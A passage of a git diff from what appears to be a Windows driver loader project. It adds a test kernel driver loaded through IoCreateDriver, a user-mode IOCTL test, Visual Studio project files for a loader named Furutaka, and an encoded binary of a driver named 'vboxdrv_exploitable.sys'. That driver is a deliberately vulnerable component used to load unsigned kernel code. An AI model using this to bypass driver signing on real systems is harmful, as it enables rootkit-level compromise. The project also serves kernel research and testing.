STATUS_INVALID_PARAMETER; + }; + + } while (condition); + + Irp->IoStatus.Status = status; + Irp->IoStatus.Information = bytesIO; + IoCompleteRequest(Irp, IO_NO_INCREMENT); + return status; +} + +/* +* UnsupportedDispatch +* +* Purpose: +* +* Unused IRP_MJ_* dispatch. +* +*/ +NTSTATUS UnsupportedDispatch( + _In_ struct _DEVICE_OBJECT *DeviceObject, + _Inout_ struct _IRP *Irp + ) +{ + UNREFERENCED_PARAMETER(DeviceObject); + + Irp->IoStatus.Status = STATUS_NOT_SUPPORTED; + IoCompleteRequest(Irp, IO_NO_INCREMENT); + return Irp->IoStatus.Status; +} + +/* +* CreateDispatch +* +* Purpose: +* +* IRP_MJ_CREATE dispatch. +* +*/ +NTSTATUS CreateDispatch( + _In_ struct _DEVICE_OBJECT *DeviceObject, + _Inout_ struct _IRP *Irp + ) +{ + UNREFERENCED_PARAMETER(DeviceObject); + +#ifdef DEBUGPRINT + DbgPrint("%s Create", __FUNCTION__); +#endif + + IoCompleteRequest(Irp, IO_NO_INCREMENT); + return Irp->IoStatus.Status; +} + +/* +* CloseDispatch +* +* Purpose: +* +* IRP_MJ_CLOSE dispatch. +* +*/ +NTSTATUS CloseDispatch( + _In_ struct _DEVICE_OBJECT *DeviceObject, + _Inout_ struct _IRP *Irp + ) +{ + UNREFERENCED_PARAMETER(DeviceObject); + +#ifdef DEBUGPRINT + DbgPrint("%s Close", __FUNCTION__); +#endif + + IoCompleteRequest(Irp, IO_NO_INCREMENT); + return Irp->IoStatus.Status; +} + +VOID ListModules( + _In_ struct _DRIVER_OBJECT *DriverObject + ) +{ + PLIST_ENTRY entry0, entry1; + KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection; + + if (section == NULL) + return; + + entry0 = section->InLoadOrderLinks.Flink; + entry1 = entry0; + + do { + section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks); + DbgPrint("Section=%p, %wZ", section, section->BaseDllName); + entry1 = entry1->Flink; + } while (entry1 != entry0); +} + +/* +* DriverInitialize +* +* Purpose: +* +* Driver main. +* +*/ +NTSTATUS DriverInitialize( + _In_ struct _DRIVER_OBJECT *DriverObject, + _In_ PUNICODE_STRING RegistryPath + ) +{ + NTSTATUS status; + UNICODE_STRING SymLink, DevName/*, DrvRefName*/; + PDEVICE_OBJECT devobj; + ULONG t; + WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 }; + WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 }; +// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 }; +// PDRIVER_OBJECT driverObject; + + //RegistryPath is NULL + UNREFERENCED_PARAMETER(RegistryPath); + +#ifdef DEBUGPRINT + DbgPrint("%s", __FUNCTION__); +#endif + + RtlInitUnicodeString(&DevName, szDevName); + status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj); + +#ifdef DEBUGPRINT + DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status); +#endif + + if (!NT_SUCCESS(status)) { + return status; + } + + RtlInitUnicodeString(&SymLink, szSymLink); + status = IoCreateSymbolicLink(&SymLink, &DevName); + +#ifdef DEBUGPRINT + DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status); +#endif + + devobj->Flags |= DO_BUFFERED_IO; + + for (t = 0; t <= IRP_MJ_MAXIMUM_FUNCTION; t++) + DriverObject->MajorFunction[t] = &UnsupportedDispatch; + + DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &DevioctlDispatch; + DriverObject->MajorFunction[IRP_MJ_CREATE] = &CreateDispatch; + DriverObject->MajorFunction[IRP_MJ_CLOSE] = &CloseDispatch; + DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload + + devobj->Flags &= ~DO_DEVICE_INITIALIZING; +/* + RtlInitUnicodeString(&DrvRefName, szNullDrv); + if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0, + *IoDriverObjectType, KernelMode, NULL, &driverObject))) + { + DbgPrint("drvObj %p", driverObject); + ListModules(driverObject); + ObDereferenceObject(driverObject); + } + */ + + return status; +} + +/* +* DriverEntry +* +* Purpose: +* +* Driver base entry point. +* +*/ +NTSTATUS DriverEntry( + _In_ struct _DRIVER_OBJECT *DriverObject, + _In_ PUNICODE_STRING RegistryPath +) +{ + NTSTATUS status; + UNICODE_STRING drvName; + WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 }; + + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ + UNREFERENCED_PARAMETER(DriverObject); + UNREFERENCED_PARAMETER(RegistryPath); + +#ifdef DEBUGPRINT + DbgPrint("%s", __FUNCTION__); +#endif + + RtlInitUnicodeString(&drvName, szDrvName); + status = IoCreateDriver(&drvName, &DriverInitialize); + +#ifdef DEBUGPRINT + DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status); +#endif + + return status; +} diff --git a/Source/DummyDrv2/dummy/main.h b/Source/DummyDrv2/dummy/main.h new file mode 100644 index 0000000..e69a424 --- /dev/null +++ b/Source/DummyDrv2/dummy/main.h @@ -0,0 +1,112 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: MAIN.H +* +* VERSION: 1.00 +* +* DATE: 29 Jan 2016 +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#pragma once + +NTKERNELAPI +NTSTATUS +IoCreateDriver( + IN PUNICODE_STRING DriverName, OPTIONAL + IN PDRIVER_INITIALIZE InitializationFunction + ); + +NTKERNELAPI +NTSTATUS +ObReferenceObjectByName( + __in PUNICODE_STRING ObjectName, + __in ULONG Attributes, + __in_opt PACCESS_STATE AccessState, + __in_opt ACCESS_MASK DesiredAccess, + __in POBJECT_TYPE ObjectType, + __in KPROCESSOR_MODE AccessMode, + __inout_opt PVOID ParseContext, + __out PVOID *Object + ); + +extern POBJECT_TYPE *IoDriverObjectType; + +_Dispatch_type_(IRP_MJ_DEVICE_CONTROL) +DRIVER_DISPATCH DevioctlDispatch; +_Dispatch_type_(IRP_MJ_CREATE) +DRIVER_DISPATCH CreateDispatch; +_Dispatch_type_(IRP_MJ_CLOSE) +DRIVER_DISPATCH CloseDispatch; + +_Dispatch_type_(IRP_MJ_CREATE) +_Dispatch_type_(IRP_MJ_CREATE_NAMED_PIPE) +_Dispatch_type_(IRP_MJ_CLOSE) +_Dispatch_type_(IRP_MJ_READ) +_Dispatch_type_(IRP_MJ_WRITE) +_Dispatch_type_(IRP_MJ_QUERY_INFORMATION) +_Dispatch_type_(IRP_MJ_SET_INFORMATION) +_Dispatch_type_(IRP_MJ_QUERY_EA) +_Dispatch_type_(IRP_MJ_SET_EA) +_Dispatch_type_(IRP_MJ_FLUSH_BUFFERS) +_Dispatch_type_(IRP_MJ_QUERY_VOLUME_INFORMATION) +_Dispatch_type_(IRP_MJ_SET_VOLUME_INFORMATION) +_Dispatch_type_(IRP_MJ_DIRECTORY_CONTROL) +_Dispatch_type_(IRP_MJ_FILE_SYSTEM_CONTROL) +_Dispatch_type_(IRP_MJ_DEVICE_CONTROL) +_Dispatch_type_(IRP_MJ_INTERNAL_DEVICE_CONTROL) +_Dispatch_type_(IRP_MJ_SHUTDOWN) +_Dispatch_type_(IRP_MJ_LOCK_CONTROL) +_Dispatch_type_(IRP_MJ_CLEANUP) +_Dispatch_type_(IRP_MJ_CREATE_MAILSLOT) +_Dispatch_type_(IRP_MJ_QUERY_SECURITY) +_Dispatch_type_(IRP_MJ_SET_SECURITY) +_Dispatch_type_(IRP_MJ_POWER) +_Dispatch_type_(IRP_MJ_SYSTEM_CONTROL) +_Dispatch_type_(IRP_MJ_DEVICE_CHANGE) +_Dispatch_type_(IRP_MJ_QUERY_QUOTA) +_Dispatch_type_(IRP_MJ_SET_QUOTA) +_Dispatch_type_(IRP_MJ_PNP) +DRIVER_DISPATCH UnsupportedDispatch; + +DRIVER_INITIALIZE DriverInitialize; +DRIVER_INITIALIZE DriverEntry; +#pragma alloc_text(INIT, DriverEntry) + +#define DUMMYDRV_REQUEST1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) + +typedef struct _INOUT_PARAM { + ULONG Param1; + ULONG Param2; + ULONG Param3; + ULONG Param4; +} INOUT_PARAM, *PINOUTPARAM; + +typedef struct _KLDR_DATA_TABLE_ENTRY { + LIST_ENTRY InLoadOrderLinks; + PVOID ExceptionTable; + ULONG ExceptionTableSize; + // ULONG padding on IA64 + PVOID GpValue; + PVOID NonPagedDebugInfo; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT __Unused5; + PVOID SectionPointer; + ULONG CheckSum; + // ULONG padding on IA64 + PVOID LoadedImports; + PVOID PatchInformation; +} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY; diff --git a/Source/DummyDrv2/dummy/r3request.c b/Source/DummyDrv2/dummy/r3request.c new file mode 100644 index 0000000..9377f3d --- /dev/null +++ b/Source/DummyDrv2/dummy/r3request.c @@ -0,0 +1,34 @@ +typedef struct _INOUT_PARAM{ + ULONG Param1; + ULONG Param2; + ULONG Param3; + ULONG Param4; +} INOUT_PARAM, *PINOUT_PARAM; + +#define DUMMYDRV_REQUEST1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) + +VOID test( + VOID + ) +{ + HANDLE h; + INOUT_PARAM tmp; + DWORD bytesIO; + + h = CreateFile(TEXT("\\\\.\\TDLD"), GENERIC_READ | GENERIC_WRITE, + FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); + if (h != INVALID_HANDLE_VALUE) { + + tmp.Param1 = 0xAAAAAAAA; + tmp.Param2 = 0xBBBBBBBB; + tmp.Param3 = 0xCCCCCCCC; + tmp.Param4 = 0xDDDDDDDD; + + DeviceIoControl(h, DUMMYDRV_REQUEST1, + &tmp, sizeof(tmp), &tmp, + sizeof(tmp), &bytesIO, NULL); + + CloseHandle(h); + } + +} \ No newline at end of file diff --git a/Source/Furutaka/Furutaka.sln b/Source/Furutaka/Furutaka.sln new file mode 100644 index 0000000..ff6fb44 --- /dev/null +++ b/Source/Furutaka/Furutaka.sln @@ -0,0 +1,22 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 14 +VisualStudioVersion = 14.0.24720.0 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Furutaka", "Furutaka.vcxproj", "{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Debug|x64.ActiveCfg = Debug|x64 + {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Debug|x64.Build.0 = Debug|x64 + {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Release|x64.ActiveCfg = Release|x64 + {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/Source/Furutaka/Furutaka.vcxproj b/Source/Furutaka/Furutaka.vcxproj new file mode 100644 index 0000000..8a78707 --- /dev/null +++ b/Source/Furutaka/Furutaka.vcxproj @@ -0,0 +1,217 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896} + Win32Proj + Furutaka + 8.1 + Furutaka + + + + Application + true + v140 + Unicode + + + Application + false + v140 + true + Unicode + + + Application + true + v140 + Unicode + + + Application + false + v140 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + true + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + false + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + AllRules.ruleset + + + false + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + NativeRecommendedRules.ruleset + false + + + + + + Level4 + Disabled + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + CompileAsC + + + Console + true + TDLMain + RequireAdministrator + + + + + + + Level4 + Disabled + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + CompileAsC + + + Console + true + TDLMain + RequireAdministrator + + + + + Level4 + + + MaxSpeed + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + CompileAsC + true + + + Console + true + true + true + TDLMain + true + RequireAdministrator + + + + + Level4 + + + MaxSpeed + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + CompileAsC + true + true + false + + + Console + true + true + true + TDLMain + true + RequireAdministrator + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Source/Furutaka/Furutaka.vcxproj.filters b/Source/Furutaka/Furutaka.vcxproj.filters new file mode 100644 index 0000000..57970a6 --- /dev/null +++ b/Source/Furutaka/Furutaka.vcxproj.filters @@ -0,0 +1,110 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + {b42df48e-a336-4e0e-9516-5a3ed47473ce} + + + + + Source Files + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + Source Files + + + Source Files + + + Source Files + + + + + Header Files + + + Header Files + + + minirtl + + + minirtl + + + minirtl + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + + + Resource Files + + + + + + \ No newline at end of file diff --git a/Source/Furutaka/Furutaka.vcxproj.user b/Source/Furutaka/Furutaka.vcxproj.user new file mode 100644 index 0000000..8f42863 --- /dev/null +++ b/Source/Furutaka/Furutaka.vcxproj.user @@ -0,0 +1,19 @@ + + + + C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys + WindowsLocalDebugger + + + C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys + WindowsLocalDebugger + + + C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys + WindowsLocalDebugger + + + C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys + WindowsLocalDebugger + + \ No newline at end of file diff --git a/Source/Furutaka/cui.c b/Source/Furutaka/cui.c new file mode 100644 index 0000000..39f6777 --- /dev/null +++ b/Source/Furutaka/cui.c @@ -0,0 +1,64 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: CUI.C +* +* VERSION: 1.00 +* +* DATE: 18 Jan 2016 +* +* Console output. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#include "global.h" + +/* +* cuiPrintText +* +* Purpose: +* +* Output text to the console or file. +* +*/ +VOID cuiPrintText( + _In_ HANDLE hOutConsole, + _In_ LPWSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn + ) +{ + SIZE_T consoleIO; + DWORD bytesIO; + LPWSTR Buffer; + + if (lpText == NULL) + return; + + consoleIO = _strlen(lpText); + if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) + return; + + consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL); + Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO); + if (Buffer) { + + _strcpy(Buffer, lpText); + if (UseReturn) _strcat(Buffer, TEXT("\r\n")); + + consoleIO = _strlen(Buffer); + + if (ConsoleOutputEnabled == TRUE) { + WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); + } + else { + WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); + } + RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer); + } +} diff --git a/Source/Furutaka/cui.h b/Source/Furutaka/cui.h new file mode 100644 index 0000000..a2ded5f --- /dev/null +++ b/Source/Furutaka/cui.h @@ -0,0 +1,28 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: CUI.H +* +* VERSION: 1.00 +* +* DATE: 18 Jan 2016 +* +* Common header file for console ui. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#pragma once + +#include "global.h" + +VOID cuiPrintText( + _In_ HANDLE hOutConsole, + _In_ LPWSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn + ); diff --git a/Source/Furutaka/drv/vboxdrv_exploitable.sys b/Source/Furutaka/drv/vboxdrv_exploitable.sys new file mode 100644 index 0000000000000000000000000000000000000000..8788e4ce7dd88e80846a650c8afeab3676fe6e24 GIT binary patch literal 68288 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 